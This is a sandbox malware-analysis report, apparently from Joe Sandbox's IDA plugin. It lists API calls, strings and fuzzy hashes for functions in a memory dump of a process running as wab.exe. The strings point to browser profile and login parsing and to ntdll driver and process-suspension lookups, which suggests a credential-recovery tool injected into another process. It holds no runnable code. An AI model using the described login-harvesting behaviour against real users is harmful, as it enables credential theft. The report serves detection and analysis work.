                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                • String ID: %s:$EDIT$STATIC
                                • API String ID: 2080319088-3046471546
                                • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                APIs
                                • EndDialog.USER32(?,?), ref: 00413221
                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                • memset.MSVCRT ref: 00413292
                                • memset.MSVCRT ref: 004132B4
                                • memset.MSVCRT ref: 004132CD
                                • memset.MSVCRT ref: 004132E1
                                • memset.MSVCRT ref: 004132FB
                                • memset.MSVCRT ref: 00413310
                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                • memset.MSVCRT ref: 004133C0
                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                • memcpy.MSVCRT ref: 004133FC
                                • wcscpy.MSVCRT ref: 0041341F
                                • _snwprintf.MSVCRT ref: 0041348E
                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                • SetFocus.USER32(00000000), ref: 004134B7
                                Strings
                                • {Unknown}, xrefs: 004132A6
                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                • API String ID: 4111938811-1819279800
                                • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                APIs
                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                • EndDialog.USER32(?,?), ref: 0040135E
                                • DeleteObject.GDI32(?), ref: 0040136A
                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                • ShowWindow.USER32(00000000), ref: 00401398
                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                • ShowWindow.USER32(00000000), ref: 004013A7
                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                • String ID:
                                • API String ID: 829165378-0
                                • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                APIs
                                • memset.MSVCRT ref: 00404172
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                • wcscpy.MSVCRT ref: 004041D6
                                • wcscpy.MSVCRT ref: 004041E7
                                • memset.MSVCRT ref: 00404200
                                • memset.MSVCRT ref: 00404215
                                • _snwprintf.MSVCRT ref: 0040422F
                                • wcscpy.MSVCRT ref: 00404242
                                • memset.MSVCRT ref: 0040426E
                                • memset.MSVCRT ref: 004042CD
                                • memset.MSVCRT ref: 004042E2
                                • _snwprintf.MSVCRT ref: 004042FE
                                • wcscpy.MSVCRT ref: 00404311
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                • API String ID: 2454223109-1580313836
                                • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                APIs
                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                • SetMenu.USER32(?,00000000), ref: 00411453
                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                • memcpy.MSVCRT ref: 004115C8
                                • ShowWindow.USER32(?,?), ref: 004115FE
                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                • API String ID: 4054529287-3175352466
                                • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                • API String ID: 3143752011-1996832678
                                • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                APIs
                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$HandleModule
                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                • API String ID: 667068680-2887671607
                                • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                • API String ID: 1607361635-601624466
                                • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _snwprintf$memset$wcscpy
                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                • API String ID: 2000436516-3842416460
                                • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                APIs
                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                • String ID:
                                • API String ID: 1043902810-0
                                • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                APIs
                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                • memset.MSVCRT ref: 0040E380
                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                • wcschr.MSVCRT ref: 0040E3B8
                                • memcpy.MSVCRT ref: 0040E3EC
                                • memcpy.MSVCRT ref: 0040E407
                                • memcpy.MSVCRT ref: 0040E422
                                • memcpy.MSVCRT ref: 0040E43D
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                • API String ID: 3073804840-2252543386
                                • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@??3@_snwprintfwcscpy
                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                • API String ID: 2899246560-1542517562
                                • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                APIs
                                • memset.MSVCRT ref: 0040DBCD
                                • memset.MSVCRT ref: 0040DBE9
                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                  • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                  • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                  • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                • wcscpy.MSVCRT ref: 0040DC2D
                                • wcscpy.MSVCRT ref: 0040DC3C
                                • wcscpy.MSVCRT ref: 0040DC4C
                                • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                • wcscpy.MSVCRT ref: 0040DCC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                • API String ID: 3330709923-517860148
                                • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                APIs
                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                • memset.MSVCRT ref: 0040806A
                                • memset.MSVCRT ref: 0040807F
                                • _wtoi.MSVCRT ref: 004081AF
                                • _wcsicmp.MSVCRT ref: 004081C3
                                • memset.MSVCRT ref: 004081E4
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                  • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                  • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                • String ID: logins$null
                                • API String ID: 3492182834-2163367763
                                • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                APIs
                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                • memset.MSVCRT ref: 004085CF
                                • memset.MSVCRT ref: 004085F1
                                • memset.MSVCRT ref: 00408606
                                • strcmp.MSVCRT ref: 00408645
                                • _mbscpy.MSVCRT ref: 004086DB
                                • _mbscpy.MSVCRT ref: 004086FA
                                • memset.MSVCRT ref: 0040870E
                                • strcmp.MSVCRT ref: 0040876B
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                • String ID: ---
                                • API String ID: 3437578500-2854292027
                                • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                APIs
                                • memset.MSVCRT ref: 0041087D
                                • memset.MSVCRT ref: 00410892
                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                • GetSysColor.USER32(0000000F), ref: 00410999
                                • DeleteObject.GDI32(?), ref: 004109D0
                                • DeleteObject.GDI32(?), ref: 004109D6
                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                • String ID:
                                • API String ID: 1010922700-0
                                • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                APIs
                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                • malloc.MSVCRT ref: 004186B7
                                • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
